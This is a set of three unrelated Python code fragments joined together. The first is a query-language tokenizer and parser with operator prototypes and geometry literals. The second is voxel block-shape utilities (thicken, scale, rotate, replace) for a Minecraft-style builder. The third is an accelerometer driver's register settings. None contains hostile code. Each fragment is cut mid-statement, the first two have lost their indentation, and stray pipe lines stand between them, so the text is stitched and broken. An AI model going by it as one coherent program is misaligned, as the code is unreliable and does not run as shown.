function_table.add(Prototype("==", (Integer, Real), Boolean))
function_table.add(Prototype("==", (Boolean, Boolean), Boolean))
function_table.add(Prototype("==", (Text, Text), Boolean))
function_table.add(Prototype("==", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("==", (UUID, UUID), Boolean))
function_table.add(Prototype("!=", (Long, Long), Boolean))
function_table.add(Prototype("!=", (Long, Integer), Boolean))
function_table.add(Prototype("!=", (Integer, Long), Boolean))
function_table.add(Prototype("!=", (Integer, Integer), Boolean))
function_table.add(Prototype("!=", (Real, Real), Boolean))
function_table.add(Prototype("!=", (Real, Long), Boolean))
function_table.add(Prototype("!=", (Long, Real), Boolean))
function_table.add(Prototype("!=", (Real, Integer), Boolean))
function_table.add(Prototype("!=", (Integer, Real), Boolean))
function_table.add(Prototype("!=", (Boolean, Boolean), Boolean))
function_table.add(Prototype("!=", (Text, Text), Boolean))
function_table.add(Prototype("!=", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("!=", (UUID, UUID), Boolean))
function_table.add(Prototype("<", (Long, Long), Boolean))
function_table.add(Prototype("<", (Long, Integer), Boolean))
function_table.add(Prototype("<", (Integer, Long), Boolean))
function_table.add(Prototype("<", (Integer, Integer), Boolean))
function_table.add(Prototype("<", (Real, Real), Boolean))
function_table.add(Prototype("<", (Real, Long), Boolean))
function_table.add(Prototype("<", (Long, Real), Boolean))
function_table.add(Prototype("<", (Real, Integer), Boolean))
function_table.add(Prototype("<", (Integer, Real), Boolean))
function_table.add(Prototype("<", (Text, Text), Boolean))
function_table.add(Prototype("<", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype(">", (Long, Long), Boolean))
function_table.add(Prototype(">", (Long, Integer), Boolean))
function_table.add(Prototype(">", (Integer, Long), Boolean))
function_table.add(Prototype(">", (Integer, Integer), Boolean))
function_table.add(Prototype(">", (Real, Real), Boolean))
function_table.add(Prototype(">", (Real, Long), Boolean))
function_table.add(Prototype(">", (Long, Real), Boolean))
function_table.add(Prototype(">", (Real, Integer), Boolean))
function_table.add(Prototype(">", (Integer, Real), Boolean))
function_table.add(Prototype(">", (Text, Text), Boolean))
function_table.add(Prototype(">", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("<=", (Long, Long), Boolean))
function_table.add(Prototype("<=", (Long, Integer), Boolean))
function_table.add(Prototype("<=", (Integer, Long), Boolean))
function_table.add(Prototype("<=", (Integer, Integer), Boolean))
function_table.add(Prototype("<=", (Real, Real), Boolean))
function_table.add(Prototype("<=", (Real, Long), Boolean))
function_table.add(Prototype("<=", (Long, Real), Boolean))
function_table.add(Prototype("<=", (Real, Integer), Boolean))
function_table.add(Prototype("<=", (Integer, Real), Boolean))
function_table.add(Prototype("<=", (Text, Text), Boolean))
function_table.add(Prototype("<=", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype(">=", (Long, Long), Boolean))
function_table.add(Prototype(">=", (Long, Integer), Boolean))
function_table.add(Prototype(">=", (Integer, Long), Boolean))
function_table.add(Prototype(">=", (Integer, Integer), Boolean))
function_table.add(Prototype(">=", (Real, Real), Boolean))
function_table.add(Prototype(">=", (Real, Long), Boolean))
function_table.add(Prototype(">=", (Long, Real), Boolean))
function_table.add(Prototype(">=", (Real, Integer), Boolean))
function_table.add(Prototype(">=", (Integer, Real), Boolean))
function_table.add(Prototype(">=", (Text, Text), Boolean))
function_table.add(Prototype(">=", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("~=", (Text, Text), Boolean))
function_table.add(Prototype("+", (Long,), Long))
function_table.add(Prototype("+", (Integer,), Integer))
function_table.add(Prototype("+", (Real,), Real))
function_table.add(Prototype("-", (Long,), Long))
function_table.add(Prototype("-", (Integer,), Integer))
function_table.add(Prototype("-", (Real,), Real))
function_table.add(Prototype("+", (Long, Long), Long))
function_table.add(Prototype("+", (Long, Integer), Long))
function_table.add(Prototype("+", (Integer, Long), Long))
function_table.add(Prototype("+", (Integer, Integer), Integer))
function_table.add(Prototype("+", (Real, Real), Real))
function_table.add(Prototype("+", (Real, Long), Real))
function_table.add(Prototype("+", (Long, Real), Real))
function_table.add(Prototype("+", (Real, Integer), Real))
function_table.add(Prototype("+", (Integer, Real), Real))
function_table.add(Prototype("-", (Long, Long), Long))
function_table.add(Prototype("-", (Long, Integer), Long))
function_table.add(Prototype("-", (Integer, Long), Long))
function_table.add(Prototype("-", (Integer, Integer), Integer))
function_table.add(Prototype("-", (Real, Real), Real))
function_table.add(Prototype("-", (Real, Long), Real))
function_table.add(Prototype("-", (Long, Real), Real))
function_table.add(Prototype("-", (Real, Integer), Real))
function_table.add(Prototype("-", (Integer, Real), Real))
function_table.add(Prototype("*", (Long, Long), Long))
function_table.add(Prototype("*", (Long, Integer), Long))
function_table.add(Prototype("*", (Integer, Long), Long))
function_table.add(Prototype("*", (Integer, Integer), Integer))
function_table.add(Prototype("*", (Real, Real), Real))
function_table.add(Prototype("*", (Real, Long), Real))
function_table.add(Prototype("*", (Long, Real), Real))
function_table.add(Prototype("*", (Real, Integer), Real))
function_table.add(Prototype("*", (Integer, Real), Real))
function_table.add(Prototype("/", (Long, Long), Long))
function_table.add(Prototype("/", (Long, Integer), Long))
function_table.add(Prototype("/", (Integer, Long), Long))
function_table.add(Prototype("/", (Integer, Integer), Integer))
function_table.add(Prototype("/", (Real, Real), Real))
function_table.add(Prototype("/", (Real, Long), Real))
function_table.add(Prototype("/", (Long, Real), Real))
function_table.add(Prototype("/", (Real, Integer), Real))
function_table.add(Prototype("/", (Integer, Real), Real))
function_table.add(Prototype("-", (Timestamp, Timestamp), Real))
#
# Functions.
#
function_table.add(Prototype("covers", (Geometry, Geometry), Boolean))
function_table.add(Prototype("covers", (Timestamp, Timestamp, Timestamp, Timestamp), Boolean))
function_table.add(Prototype("intersects", (Geometry, Geometry), Boolean))
function_table.add(Prototype("intersects", (Timestamp, Timestamp, Timestamp, Timestamp), Boolean))
function_table.add(Prototype("is_defined", (Long,), Boolean))
function_table.add(Prototype("is_defined", (Integer,), Boolean))
function_table.add(Prototype("is_defined", (Real,), Boolean))
function_table.add(Prototype("is_defined", (Boolean,), Boolean))
function_table.add(Prototype("is_defined", (Text,), Boolean))
function_table.add(Prototype("is_defined", (Timestamp,), Boolean))
function_table.add(Prototype("is_defined", (UUID,), Boolean))
function_table.add(Prototype("is_defined", (Geometry,), Boolean))
function_table.add(Prototype("is_source_of", (UUID,), Boolean))
function_table.add(Prototype("is_derived_from", (UUID,), Boolean))
function_table.add(Prototype("has_tag", (Text,), Boolean))
function_table.add(Prototype("now", (), Timestamp))
class TokenType(Enum):
_items = ("TEXT", "UUID", "TIMESTAMP", "REAL", "INTEGER", "BOOLEAN", "NAME", "OPERATOR", "END")
class Token(object):
def __init__(self, type_, value=None):
self.type_ = type_
self.value = value
def __repr__(self):
return "Token(type_ = TokenType.%s, value = %r)" % (TokenType.to_string(self.type_), self.value)
class TokenStream(object):
_sub_patterns = \
(
r"""\"(?:[^\\"]|\\.)*\"""", # Text literals
r"""\d{4}-\d{2}-\d{2}(?:T\d{2}:\d{2}:\d{2}(?:\.\d{0,6})?)?""", # Timestamp literals
r"""[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}""", # UUID literals
r"""\d+(?:\.\d*(?:[eE][+-]?\d+)?|[eE][+-]?\d+)""", # Real literals
r"""\d+""", # Integer literals
r"""true|false""", # Boolean literals
r"""[a-zA-Z]\w*""", # Names
r"""<=|>=|==|!=|~=|[*<>@(),.+-/]""" # Operators and delimiters
)
_pattern = r"""(?:%s)""" % ("|".join(["(%s)" % sub_pattern for sub_pattern in _sub_patterns]))
_re_token = re.compile(_pattern)
    _re_datemin = re.compile(r"0000-00-00(?:T00:00:00(?:\.0{0,6})?)?$")
    _re_datemax = re.compile(r"9999-99-99(?:T99:99:99(?:\.9{0,6})?)?$")
def __init__(self, text):
self.text = text
self.at_end = not self.text
self.token_start_position, self.token_end_position = 0, 0
self.next()
def next(self):
if self.at_end:
raise Error("char %d: unexpected end of input" % (self.token_start_position + 1))
self.token = self._next_token()
return self.token
def test(self, types, values=None):
return False if not self._test_token_types(types) else (values is None or self._test_token_values(values))
def accept(self, types, values=None):
if not self.test(types, values):
return False
self.next()
return True
def expect(self, types, values=None):
if not self.test(types, values):
if self.token.type_ == TokenType.END:
raise Error("char %d: unexpected end of input" % (self.token_start_position + 1))
else:
if self.token.value is None:
token_str = TokenType.to_string(self.token.type_)
else:
token_str = "\"%s\"" % self.token.value
expected_str = self._types_to_string(types) if values is None else self._values_to_string(values)
raise Error("char %d: expected %s, got %s" % (self.token_start_position + 1, expected_str, token_str))
token = self.token
self.next()
return token
def _types_to_string(self, types):
try:
strings = map(TokenType.to_string, types)
except TypeError:
return TokenType.to_string(types)
return "%s%s" % ("" if len(strings) == 1 else "one of: ", ", ".join(strings))
def _values_to_string(self, values):
if isinstance(values, basestring):
return "\"%s\"" % values
try:
strings = ["\"%s\"" % value for value in values]
except TypeError:
return "\"%s\"" % values
return "%s%s" % ("" if len(strings) == 1 else "one of: ", ", ".join(strings))
def _test_token_types(self, types):
try:
return self.token.type_ in types
except TypeError:
return self.token.type_ == types
def _test_token_values(self, values):
if isinstance(values, basestring):
return self.token.value == values
try:
return self.token.value in values
except TypeError:
return self.token.value == values
def _next_token(self):
self.token_start_position = self._skip_white_space(self.token_end_position)
if self.token_start_position == len(self.text):
self.at_end = True
return Token(TokenType.END)
match_object = self._re_token.match(self.text, self.token_start_position)
if match_object is None:
raise Error("char %d: syntax error: \"%s\"" % (self.token_start_position + 1,
self.text[self.token_start_position:]))
self.token_start_position, self.token_end_position = match_object.span()
text, timestamp, uuid_, real, integer, boolean, name, operator = match_object.groups()
if text is not None:
return Token(TokenType.TEXT, string_unescape(text[1:-1]))
if uuid_ is not None:
return Token(TokenType.UUID, uuid.UUID(uuid_))
if timestamp is not None:
return Token(TokenType.TIMESTAMP, self._parse_timestamp(timestamp))
if real is not None:
return Token(TokenType.REAL, float(real))
if integer is not None:
return Token(TokenType.INTEGER, int(integer))
if boolean is not None:
return Token(TokenType.BOOLEAN, boolean == "true")
if name is not None:
return Token(TokenType.NAME, name)
if operator is not None:
return Token(TokenType.OPERATOR, operator)
raise Error("char %d: syntax error: \"%s\"" % (self.token_start_position + 1, match_object.group()))
def _skip_white_space(self, start):
while start < len(self.text) and self.text[start].isspace():
start += 1
return start
def _parse_timestamp(self, timestamp):
if self._re_datemin.match(timestamp) is not None:
return datetime.datetime.min
if self._re_datemax.match(timestamp) is not None:
return datetime.datetime.max
for format_string in ("%Y-%m-%d", "%Y-%m-%dT%H:%M:%S", "%Y-%m-%dT%H:%M:%S.%f"):
try:
return datetime.datetime.strptime(timestamp, format_string)
except ValueError:
pass
raise Error("char %d: invalid timestamp: \"%s\"" % (self.token_start_position + 1, timestamp))
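# A minimal usage sketch (hypothetical input; Error and string_unescape are assumed
# to be defined earlier in this module):
#   ts = TokenStream('created >= 2020-01-01')
#   ts.token     -> Token(type_ = TokenType.NAME, value = 'created')
#   ts.next()    -> Token(type_ = TokenType.OPERATOR, value = '>=')
#   ts.next()    -> Token(type_ = TokenType.TIMESTAMP, value = datetime.datetime(2020, 1, 1, 0, 0))
# accept()/expect() advance the stream, and expect() raises Error on a mismatch.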
class AbstractSyntaxTreeNode(object):
pass
class Literal(AbstractSyntaxTreeNode):
def __init__(self, value):
self.value = value
def __str__(self):
return "(%s %s)" % (type(self).__name__, self.value)
class Name(AbstractSyntaxTreeNode):
def __init__(self, value):
self.value = value
def __str__(self):
return "(%s %s)" % (type(self).__name__, self.value)
class ParameterReference(AbstractSyntaxTreeNode):
def __init__(self, name):
self.name = name
def __str__(self):
return "(%s %s)" % (type(self).__name__, self.name)
class FunctionCall(AbstractSyntaxTreeNode):
def __init__(self, name, *args):
self.name = name
self.arguments = list(args)
def __str__(self):
if not self.arguments:
return "(%s %s)" % (type(self).__name__, self.name)
return "(%s %s %s)" % (type(self).__name__, self.name, " ".join(map(str, self.arguments)))
def parse_sequence(stream, parse_item_function):
stream.expect(TokenType.OPERATOR, "(")
if stream.accept(TokenType.OPERATOR, ")"):
return []
sequence = [parse_item_function(stream)]
while stream.accept(TokenType.OPERATOR, ","):
sequence.append(parse_item_function(stream))
stream.expect(TokenType.OPERATOR, ")")
return sequence
def parse_geometry_sequence(stream, parse_item_function):
if stream.accept(TokenType.NAME, "EMPTY"):
return []
stream.expect(TokenType.OPERATOR, "(")
sequence = [parse_item_function(stream)]
while stream.accept(TokenType.OPERATOR, ","):
sequence.append(parse_item_function(stream))
stream.expect(TokenType.OPERATOR, ")")
return sequence
def parse_signed_coordinate(stream):
if stream.accept(TokenType.OPERATOR, "-"):
token = stream.expect((TokenType.INTEGER, TokenType.REAL))
return -float(token.value)
stream.accept(TokenType.OPERATOR, "+")
token = stream.expect((TokenType.INTEGER, TokenType.REAL))
return float(token.value)
def parse_point_raw(stream):
return geometry.Point(parse_signed_coordinate(stream),
parse_signed_coordinate(stream))
def parse_point(stream):
stream.expect(TokenType.OPERATOR, "(")
point = parse_point_raw(stream)
stream.expect(TokenType.OPERATOR, ")")
return point
def parse_line_string(stream):
return geometry.LineString(parse_geometry_sequence(stream, parse_point_raw))
def parse_linear_ring(stream):
points = parse_geometry_sequence(stream, parse_point_raw)
if len(points) == 0:
return geometry.LinearRing()
if len(points) < 4:
raise Error("char %d: linear ring should be empty or should contain >= 4 points" % stream.token_start_position)
if points[-1] != points[0]:
raise Error("char %d: linear ring should be closed" % stream.token_start_position)
return geometry.LinearRing(points[:-1])
def parse_polygon(stream):
return geometry.Polygon(parse_geometry_sequence(stream, parse_linear_ring))
def parse_multi_point(stream):
return geometry.MultiPoint(parse_geometry_sequence(stream, parse_point))
def parse_multi_line_string(stream):
return geometry.MultiLineString(parse_geometry_sequence(stream, parse_line_string))
def parse_multi_polygon(stream):
return geometry.MultiPolygon(parse_geometry_sequence(stream, parse_polygon))
def parse_atom(stream):
# Sub-expression.
if stream.accept(TokenType.OPERATOR, "("):
sub_expression = parse_expression(stream)
stream.expect(TokenType.OPERATOR, ")")
return sub_expression
# Parameter reference.
if stream.accept(TokenType.OPERATOR, "@"):
name_token = stream.expect(TokenType.NAME)
return ParameterReference(name_token.value)
# Geometry literal, function call, or name.
if stream.test(TokenType.NAME):
name_token = stream.expect(TokenType.NAME)
# Geometry literals.
if name_token.value == "POINT":
return Literal(parse_point(stream))
elif name_token.value == "LINESTRING":
return Literal(parse_line_string(stream))
elif name_token.value == "POLYGON":
return Literal(parse_polygon(stream))
elif name_token.value == "MULTIPOINT":
return Literal(parse_multi_point(stream))
elif name_token.value == "MULTILINESTRING":
return Literal(parse_multi_line_string(stream))
elif name_token.value == "MULTIPOLYGON":
return Literal(parse_multi_polygon(stream))
# Function call.
if stream.test(TokenType.OPERATOR, "("):
return FunctionCall(name_token.value, *parse_sequence(stream, parse_expression))
# Name (possibly qualified).
parts = [name_token.value]
while stream.accept(TokenType.OPERATOR, "."):
name_token = stream.expect(TokenType.NAME)
parts.append(name_token.value)
return Name(".".join(parts))
# Literal.
token = stream.expect((TokenType.TEXT, TokenType.TIMESTAMP, TokenType.UUID, TokenType.REAL, TokenType.INTEGER,
TokenType.BOOLEAN))
return Literal(token.value)
def parse_term(stream):
if stream.test(TokenType.OPERATOR, ("+", "-")):
operator_token = stream.expect(TokenType.OPERATOR, ("+", | |
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import numpy as np
from collections import Counter
from build_utils import blocks_list_to_npy # , npy_to_blocks_list
##############################################
# WARNING: all npy arrays in this file are xyz
# not yzx
def maybe_convert_to_npy(blocks):
"""Convert a list of blocks to numpy array"""
if type(blocks) is list:
blocks, _ = blocks_list_to_npy(blocks, xyz=True)
return blocks
else:
assert blocks.shape[-1] == 2
assert len(blocks.shape) == 4
return blocks.copy()
def maybe_convert_to_list(blocks):
"""Convert blocks to a list"""
if type(blocks) is list:
return blocks.copy()
else:
nz = np.transpose(blocks[:, :, :, 0].nonzero())
return [(tuple(loc), tuple(blocks[tuple(loc)])) for loc in nz]
def flint(x):
return int(np.floor(x))
def ceint(x):
return int(np.ceil(x))
def check_boundary(p, m, M):
if (
p[0] == m[0]
or p[0] == M[0] - 1
or p[1] == m[1]
or p[1] == M[1] - 1
or p[2] == m[2]
or p[2] == M[2] - 1
):
return True
else:
return False
def reshift(shape):
m = np.min([l[0] for l in shape], axis=0)
return [((b[0][0] - m[0], b[0][1] - m[1], b[0][2] - m[2]), b[1]) for b in shape]
def moment_at_center(npy, sl):
"""
shifts the object in the 4d numpy array so that the center of mass is at sl//2
in a sl x sl x sl x 2 array
warning, this will cut anything that is too big to fit in sl x sl x sl
and then the moment might not actually be in center.
"""
nz = np.transpose(npy[:, :, :, 0].nonzero())
mins = np.min(nz, axis=0)
shifted_nz = nz - mins
com = np.floor(np.array(shifted_nz.mean(axis=0)))
# this will fail if com is bigger than sl.
assert all(com < sl)
npy_out_center = np.array((sl // 2, sl // 2, sl // 2))
shifted_nz = (shifted_nz - com + npy_out_center).astype("int32")
npy_out = np.zeros((sl, sl, sl, 2), dtype="int32")
for i in range(nz.shape[0]):
if all(shifted_nz[i] >= 0) and all(shifted_nz[i] - sl < 0):
npy_out[tuple(shifted_nz[i])] = npy[tuple(nz[i])]
return npy_out
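# Illustrative sketch (hypothetical shapes): centering a single block in a 5x5x5x2
# array places it at index (2, 2, 2).
#   npy = np.zeros((1, 1, 1, 2), dtype="int32"); npy[0, 0, 0] = (1, 0)
#   moment_at_center(npy, 5)[2, 2, 2]  -> array([1, 0])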
#############################################
## THICKEN
#############################################
# this doesn't preserve corners. should it?
# separate deltas per dim?
def thicker_blocks(blocks, delta=1):
"""Takes a list of blocks and thickens them
by an amount equal to delta"""
newblocks = {l: idm for (l, idm) in blocks}
for b in blocks:
for dx in range(-delta, delta + 1):
for dy in range(-delta, delta + 1):
for dz in range(-delta, delta + 1):
l = b[0]
newblocks[(l[0] + dx, l[1] + dy, l[2] + dz)] = b[1]
return list(newblocks.items())
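# Example sketch (hypothetical block list): with delta=1 a single block at (5, 5, 5)
# grows into its full 3x3x3 neighborhood, i.e. 27 (loc, idm) pairs sharing its idm.
#   thicker_blocks([((5, 5, 5), (1, 0))], delta=1)  -> 27 blocks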
def thicker(blocks, delta=1):
"""
Returns:
numpy array of blocks thickened with an amount delta
"""
blocks = maybe_convert_to_list(blocks)
newblocks = thicker_blocks(blocks, delta=delta)
npy, _ = blocks_list_to_npy(newblocks, xyz=True)
return npy
#############################################
## SCALE
#############################################
def get_loc_weight(idx, cell_size):
""" compute the scaled indices and amount in 1d they
extend on either side of the block boundary
"""
left = idx * cell_size
right = (idx + 1) * cell_size
lidx = int(np.floor(left))
ridx = int(np.floor(right))
if ridx > lidx:
right_weight = right - ridx
left_weight = ridx - left
else:
right_weight = 0
left_weight = 1
return (lidx, ridx), (left_weight, right_weight)
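# Worked example (hypothetical numbers): small cell 1 with cell_size=0.75 spans
# [0.75, 1.5), straddling big cells 0 and 1, so
#   get_loc_weight(1, 0.75)  -> ((0, 1), (0.25, 0.5))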
def get_cell_weights(idxs, cell_szs):
""" compute the amount of the cell in each of
the 8 cubes it might touch """
index = []
dw = []
for k in range(3):
i, w = get_loc_weight(idxs[k], cell_szs[k])
index.append(i)
dw.append(w)
cell_weights = np.zeros((2, 2, 2))
best_cell = None
big_weight = 0.0
total_weight = 0.0
for i in range(2):
for j in range(2):
for k in range(2):
w = dw[0][i] * dw[1][j] * dw[2][k]
cell_weights[i, j, k] = w
total_weight += w
if w > big_weight:
big_weight = w
best_cell = (index[0][i], index[1][j], index[2][k])
cell_weights = cell_weights / total_weight
return best_cell, index, cell_weights
def scale(blocks, lams=(1.0, 1.0, 1.0)):
""" scales the blockobject in the ith direction with factor lams[i]
algorithm is to first scale the blocks up (so each minecraft cube has
size lams), and then for each 1x1x1 block arranged in place assign it
the id, meta of the big block it most intersects
"""
assert lams[0] >= 1.0 # eventually FIXME?
assert lams[1] >= 1.0 # eventually FIXME?
assert lams[2] >= 1.0 # eventually FIXME?
inp = maybe_convert_to_npy(blocks)
szs = np.array(inp.shape[:3])
big_szs = np.ceil(szs * lams)
cell_szs = szs / big_szs
big_szs = big_szs.astype("int32")
big = np.zeros(tuple(big_szs) + (2,)).astype("int32")
for i in range(big_szs[0]):
for j in range(big_szs[1]):
for k in range(big_szs[2]):
best_cell, _, _ = get_cell_weights((i, j, k), cell_szs)
big[i, j, k, :] = inp[best_cell]
return big
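# Usage sketch (hypothetical factors): doubling a schematic along x and y while
# keeping z turns a 3x4x5 block array into a 6x8x5 array, each output voxel taking
# the (id, meta) of the input block it mostly overlaps.
#   big = scale(blocks, lams=(2.0, 2.0, 1.0))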
def scale_sparse(blocks, lams=(1.0, 1.0, 1.0)):
""" scales the blockobject in the ith direction with factor lams[i]
algorithm is to first scale the blocks up (so each minecraft cube has
size lams), and then for each 1x1x1 block arranged in place assign it
the id, meta of the big block it most intersects
"""
assert lams[0] >= 1.0 # eventually FIXME?
assert lams[1] >= 1.0 # eventually FIXME?
assert lams[2] >= 1.0 # eventually FIXME?
inp = maybe_convert_to_list(blocks)
locs = [l for (l, idm) in inp]
m = np.min(locs, axis=0)
inp_dict = {(l[0] - m[0], l[1] - m[1], l[2] - m[2]): idm for (l, idm) in inp}
szs = np.max(locs, axis=0) - np.min(locs, axis=0) + 1
big_szs = np.ceil(szs * lams)
cell_szs = szs / big_szs
big_szs = big_szs.astype("int32")
big = np.zeros(tuple(big_szs) + (2,)).astype("int32")
for (x, y, z) in inp_dict.keys():
for i in range(flint(x * lams[0]), ceint(x * lams[0]) + 2):
for j in range(flint(y * lams[1]), ceint(y * lams[1]) + 2):
for k in range(flint(z * lams[2]), ceint(z * lams[2]) + 2):
if i < big_szs[0] and j < big_szs[1] and k < big_szs[2]:
best_cell, _, _ = get_cell_weights((i, j, k), cell_szs)
idm = inp_dict.get(best_cell)
if idm:
big[i, j, k, :] = idm
else:
big[i, j, k, :] = (0, 0)
return big
def shrink_sample(blocks, lams):
"""Shrink the blocks with dimensions in lams"""
assert lams[0] <= 1.0
assert lams[1] <= 1.0
assert lams[2] <= 1.0
blocks = maybe_convert_to_npy(blocks)
szs = blocks.shape
xs = np.floor(np.arange(0, szs[0], 1 / lams[0])).astype("int32")
ys = np.floor(np.arange(0, szs[1], 1 / lams[1])).astype("int32")
zs = np.floor(np.arange(0, szs[2], 1 / lams[2])).astype("int32")
small = np.zeros((len(xs), len(ys), len(zs), 2), dtype="int32")
for i in range(len(xs)):
for j in range(len(ys)):
for k in range(len(zs)):
small[i, j, k] = blocks[xs[i], ys[j], zs[k]]
return small
#############################################
## ROTATE
#############################################
def rotate(blocks, angle=0, mirror=-1, plane="xz"):
"""Rotate a list of blocks by an angle 'angle' along
the plane given by 'plane'.
If 'mirror' is > 0, a mirror image of the blocks is returned
Returns:
        A rotated numpy array of blocks
"""
inp = maybe_convert_to_npy(blocks)
if mirror > 0:
inp = np.flip(inp, mirror)
# maybe generalize?
assert angle % 90 == 0
i = angle // 90
if i < 0:
i = i % 4
if plane == "xz" or plane == "zx":
return np.rot90(inp, i, axes=(0, 2))
elif plane == "xy" or plane == "yx":
return np.rot90(inp, i, axes=(0, 1))
else:
return np.rot90(inp, i, axes=(1, 2))
#############################################
## REPLACE
#############################################
def hash_idm(npy):
return npy[:, :, :, 0] + 1000 * npy[:, :, :, 1]
def unhash_idm(npy):
npy = npy.astype("int32")
b = npy % 1000
m = (npy - b) // 1000
return np.stack((b, m), axis=3)
# TODO current_idm should be a list
def replace_by_blocktype(blocks, new_idm=(0, 0), current_idm=None, every_n=1, replace_every=False):
"""replace some blocks with a different kind
note that it is allowed that new_idm is (0,0)
"""
if current_idm is not None: # specifying a transformation of one blocktype to another
blocks = maybe_convert_to_npy(blocks)
h = hash_idm(blocks)
u = h.copy()
old_idm_hash = current_idm[0] + 1000 * current_idm[1]
new_idm_hash = new_idm[0] + 1000 * new_idm[1]
u[u == old_idm_hash] = new_idm_hash
out = unhash_idm(u)
else: # TODO FIXME need better algorithm here
if every_n == 1 and not replace_every:
lblocks = maybe_convert_to_list(blocks)
mode = Counter([idm for loc, idm in lblocks]).most_common(1)[0][0]
            # blocks are (loc, idm) pairs; rebuild the list instead of mutating tuples
            lblocks = [(loc, new_idm) if idm == mode else (loc, idm) for (loc, idm) in lblocks]
            return maybe_convert_to_npy(lblocks)
blocks = maybe_convert_to_npy(blocks)
out = blocks.copy()
if type(every_n) is int:
every_n = (every_n, every_n, every_n)
nzmask = blocks[:, :, :, 0] > 0
every_n_mask = nzmask.copy()
every_n_mask[:] = False
        every_n_mask[:: every_n[0], :: every_n[1], :: every_n[2]] = True
mask = np.logical_and(every_n_mask, nzmask)
out_b = out[:, :, :, 0]
out_b[mask] = new_idm[0]
out_m | |
| (bw << 6)
#print(value)
self.write_reg(self.REG_CTRL_REG6,value)
'''
@brief Set power mode
@param mode 16 power modes to choose from
HIGH_PERFORMANCE_14BIT #High-Performance Mode
CONT_LOWPWR4_14BIT #Continuous measurement,Low-Power Mode 4(14-bit resolution)
CONT_LOWPWR3_14BIT #Continuous measurement,Low-Power Mode 3(14-bit resolution)
CONT_LOWPWR2_14BIT #Continuous measurement,Low-Power Mode 2(14-bit resolution)
CONT_LOWPWR1_12BIT #Continuous measurement,Low-Power Mode 1(12-bit resolution)
SING_LELOWPWR4_14BIT #Single data conversion on demand mode,Low-Power Mode 4(14-bit resolution)
           SING_LELOWPWR3_14BIT #Single data conversion on demand mode,Low-Power Mode 3(14-bit resolution)
SING_LELOWPWR2_14BIT #Single data conversion on demand mode,Low-Power Mode 2(14-bit resolution)
SING_LELOWPWR1_12BIT #Single data conversion on demand mode,Low-Power Mode 1(12-bit resolution)
HIGHP_ERFORMANCELOW_NOISE_14BIT #High-Performance Mode,Low-noise enabled
CONT_LOWPWRLOWNOISE4_14BIT #Continuous measurement,Low-Power Mode 4(14-bit resolution,Low-noise enabled)
CONT_LOWPWRLOWNOISE3_14BIT #Continuous measurement,Low-Power Mode 3(14-bit resolution,Low-noise enabled)
CONT_LOWPWRLOWNOISE2_14BIT #Continuous measurement,Low-Power Mode 2(14-bit resolution,Low-noise enabled)
           CONT_LOWPWRLOWNOISE1_12BIT #Continuous measurement,Low-Power Mode 1(12-bit resolution,Low-noise enabled)
SINGLE_LOWPWRLOWNOISE4_14BIT #Single data conversion on demand mode,Low-Power Mode 4(14-bit resolution),Low-noise enabled
SINGLE_LOWPWRLOWNOISE3_14BIT #Single data conversion on demand mode,Low-Power Mode 3(14-bit resolution),Low-noise enabled
SINGLE_LOWPWRLOWNOISE2_14BIT #Single data conversion on demand mode,Low-Power Mode 2(14-bit resolution),Low-noise enabled
SINGLE_LOWPWRLOWNOISE1_12BIT #Single data conversion on demand mode,Low-Power Mode 1(12-bit resolution),Low-noise enabled
'''
def set_power_mode(self,mode):
value = self.read_reg(self.REG_CTRL_REG1)
value = value & (~0x0f)
value = value | (mode & 0xf)
self.write_reg(self.REG_CTRL_REG1,value)
#print("set_power_mode")
#print(value)
value = self.read_reg(self.REG_CTRL_REG6)
enable = mode >> 4
value = value & (~(1 << 2))
value = value | (enable << 2)
#print(value)
self.write_reg(self.REG_CTRL_REG6,value)
'''
@brief Set data measurement rate
@param rate rate
RATE_OFF #Measurement off
RATE_1HZ6 #1.6hz, use only under low-power mode
RATE_12HZ5 #12.5hz
RATE_25HZ
RATE_50HZ
RATE_100HZ
RATE_200HZ
RATE_400HZ #Use only under High-Performance mode
RATE_800HZ #Use only under High-Performance mode
RATE_1600HZ #Use only under High-Performance mode
SETSWTRIG #The software triggers a single measurement
'''
def set_data_rate(self, rate):
value = self.read_reg(self.REG_CTRL_REG1)
value = value & (~(0xf << 4))
value = value | (rate << 4)
#print("set_data_rate")
#print(value)
self.write_reg(self.REG_CTRL_REG1,value)
value = self.read_reg(self.REG_CTRL_REG3)
enable = (rate&0x30) >> 4
value = value & (~3)
value = value | enable
#print(value)
self.write_reg(self.REG_CTRL_REG3,value)
'''
    @brief Set the free-fall duration, i.e. the number of free-fall samples. A measurement is not reported as a free-fall event unless there are enough samples.
@param dur duration, range:0~31
@n time = dur * (1/rate)(unit:s)
| An example of a linear relationship between an argument and time |
|------------------------------------------------------------------------------------------------------------------------|
| | | | | |
    | Data rate |        25 Hz         |        100 Hz          |        400 Hz          |        800 Hz           |
|------------------------------------------------------------------------------------------------------------------------|
| time |dur*(1s/25)= dur*40ms| dur*(1s/100)= dur*10ms | dur*(1s/400)= dur*2.5ms | dur*(1s/800)= dur*1.25ms |
|------------------------------------------------------------------------------------------------------------------------|
'''
def set_free_fall_Dur(self,dur):
value1 = self.read_reg(self.REG_WAKE_UP_DUR)
value2 = self.read_reg(self.REG_FREE_FALL)
value1 = value1 & (~0x80)
value2 = value2 & (~0xf8)
value2 = value2 | (dur << 3)
#print(value1)
self.write_reg(self.REG_WAKE_UP_DUR,value1)
#print(value2)
self.write_reg(self.REG_FREE_FALL,value2)
self.__set_ff_threshold(3)
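    # Worked example (hypothetical rate): at a 100 Hz data rate, dur=5 gives a
    # free-fall window of 5 * (1/100) s = 50 ms before the event is reported.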
'''
@brief Set Free-fall threshold
@param th threshold
'''
def __set_ff_threshold(self,th):
value = self.read_reg(self.REG_FREE_FALL)
value = value & (~0x07)
value = value | (th & 0x07)
#print(value)
self.write_reg(self.REG_FREE_FALL,value)
'''
@brief Set the interrupt source of the int1 pin
    @param event Interrupt event; once set, a level transition is generated on the int1 pin when the event occurs
DOUBLE_TAP #Double tap event
FREEFALL #Freefall event
WAKEUP #Wake-up event
SINGLE_TAP #Single tap event
IA6D #An event changed the status of facing up/down/left/right/forward/back
'''
def set_int1_event(self,event):
